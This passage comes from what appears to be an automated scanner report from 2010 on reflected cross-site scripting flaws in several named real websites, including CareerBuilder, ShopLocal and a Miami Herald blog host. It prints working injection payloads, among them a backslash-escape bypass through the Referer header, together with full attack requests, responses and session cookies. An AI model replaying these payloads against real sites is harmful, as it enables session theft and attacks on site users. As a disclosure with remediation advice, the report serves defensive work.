var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '174.121.222.18'; var view = ''; var edit = '0'; var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=43501a4e3'-alert(1)-'ba6e9cc672&bid=2267';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script');
//-- grabbing our script element var scriptEl = scripts[ scripts.length ...[SNIP]...
2.247. http://www.rentalhomesplus.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rentalhomesplus.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fff53"-alert(1)-"c1b63fc5c18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fff53"-alert(1)-"c1b63fc5c18=1 HTTP/1.1 Host: www.rentalhomesplus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.248. http://www.shoplocal.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4390'-alert(1)-'aca305d9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e4390'-alert(1)-'aca305d9be=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=uioo4y55ykop5355roagiprp; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Wed, 14-Nov-2035 23:45:10 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:45:09 GMT Connection: close Content-Length: 56291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?e4390'-alert(1)-'aca305d9be=1&action=home&viewmode=local&referrer=&random=897241575&siteid=252&SessionID=0&pagecounter=1&detid=9940000000&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1853c"style%3d"x%3aexpression(alert(1))"40924e9e725 was submitted in the client parameter. This input was echoed as 1853c"style="x:expression(alert(1))"40924e9e725 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
2.250. http://yourblogs.miamiherald.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://yourblogs.miamiherald.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2473"><script>alert(1)</script>d18d2a8007 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?b2473"><script>alert(1)</script>d18d2a8007=1 HTTP/1.1 Host: yourblogs.miamiherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 22:53:43 GMT Server: Apache/2.0.54 (Fedora) X-Powered-By: PHP/5.0.4 ETag: d04fd3aaf6ab2773e6e35b65c34361f5 X-RSS-CACHE-STATUS: MISS Last-Modified: Sun, 14 Nov 2010 21:45:19 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 109951
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d5fd\'%3balert(1)//663d5006bad was submitted in the Referer HTTP header. This input was echoed as 9d5fd\\';alert(1)//663d5006bad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=9d5fd\'%3balert(1)//663d5006bad
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 199301 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" X-Powered-By: ASP.NET X-PBY: BEAR25 Date: Sun, 14 Nov 2010 23:35:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Accoun ...[SNIP]... '; s_cb.channel='JS_FindJobs'; s_cb.prop1='AG Subdomain Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 9d5fd\\';alert(1)//663d5006bad'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f6fc\'%3balert(1)//8602fe1ed7 was submitted in the Referer HTTP header. This input was echoed as 9f6fc\\';alert(1)//8602fe1ed7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=9f6fc\'%3balert(1)//8602fe1ed7
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 199290 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" X-Powered-By: ASP.NET X-PBY: REBEL35 Date: Sun, 14 Nov 2010 23:23:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Accoun ...[SNIP]... '; s_cb.channel='JS_FindJobs'; s_cb.prop1='AG Subdomain Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 9f6fc\\';alert(1)//8602fe1ed7'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 114ab\'%3balert(1)//117bf833582 was submitted in the Referer HTTP header. This input was echoed as 114ab\\';alert(1)//117bf833582 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Jobs/JobResults.aspx HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=114ab\'%3balert(1)//117bf833582
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 186387 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR37 Date: Sun, 14 Nov 2010 23:28:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Job Se ...[SNIP]... ='Job Results'; s_cb.eVar5='JS_AS_Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', '; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 114ab\\';alert(1)//117bf833582'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56918\'%3balert(1)//e3aa076828a was submitted in the Referer HTTP header. This input was echoed as 56918\\';alert(1)//e3aa076828a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida/?lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=56918\'%3balert(1)//e3aa076828a
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 179849 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR44 Date: Sun, 14 Nov 2010 23:17:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Florid ...[SNIP]... lts'; s_cb.eVar5='JS_AS_State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 56918\\';alert(1)//e3aa076828a'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6309b\'%3balert(1)//59d7ac59f1b was submitted in the Referer HTTP header. This input was echoed as 6309b\\';alert(1)//59d7ac59f1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida/ HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=6309b\'%3balert(1)//59d7ac59f1b
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 180061 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR28 Date: Sun, 14 Nov 2010 23:00:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Florid ...[SNIP]... lts'; s_cb.eVar5='JS_AS_State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 6309b\\';alert(1)//59d7ac59f1b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f480a\'%3balert(1)//b802c5c94bd was submitted in the Referer HTTP header. This input was echoed as f480a\\';alert(1)//b802c5c94bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=f480a\'%3balert(1)//b802c5c94bd
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 176225 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR41 Date: Sun, 14 Nov 2010 23:00:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - f480a\\';alert(1)//b802c5c94bd'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64d8c\'%3balert(1)//f4ef47d3f32 was submitted in the Referer HTTP header. This input was echoed as 64d8c\\';alert(1)//f4ef47d3f32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=64d8c\'%3balert(1)//f4ef47d3f32
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 176040 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR4 Date: Sun, 14 Nov 2010 23:12:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 64d8c\\';alert(1)//f4ef47d3f32'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9545f\'%3balert(1)//6cfbcaa7226 was submitted in the Referer HTTP header. This input was echoed as 9545f\\';alert(1)//6cfbcaa7226 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh031 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9545f\'%3balert(1)//6cfbcaa7226
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 176553 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=cbcb0fadca3b47c1a9569e6e471e16f6-343070704-RF-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650561189DB47D6ABB196DB4CB014BD6697662C7951FB969626D18C76975F0BABBE1A91E862CEC15D12; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:03 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:03 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL15 Date: Sun, 14 Nov 2010 22:25:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 9545f\\';alert(1)//6cfbcaa7226'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45845\'%3balert(1)//4dd1c60a594 was submitted in the Referer HTTP header. This input was echoed as 45845\\';alert(1)//4dd1c60a594 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
